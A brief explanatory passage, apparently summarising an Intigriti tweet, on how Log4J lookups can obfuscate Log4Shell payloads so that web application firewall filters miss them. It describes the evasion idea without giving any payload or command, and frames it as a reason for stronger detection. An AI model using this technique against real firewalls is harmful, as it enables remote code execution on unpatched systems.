This bypass technique targets Web Application Firewalls (WAFs) that attempt to block Log4Shell attacks by filtering payloads. Many companies set up these rules to detect and filter suspicious payloads that could lead to Remote Code Execution (RCE). However, attackers can leverage Log4J's built-in string manipulation lookups to obfuscate payloads, effectively bypassing the standard detection mechanisms. This means that the payloads are encoded or transformed in a way that the WAF does not recognize as malicious, thus allowing the attack to pass through the firewall. This technique exploits the dynamic evaluation nature of Log4J lookups, making it a sophisticated method to evade basic filters and emphasizing the need for more advanced detection and mitigation strategies in WAF implementations.
Original tweet: https://twitter.com/intigriti/status/1953744273653866538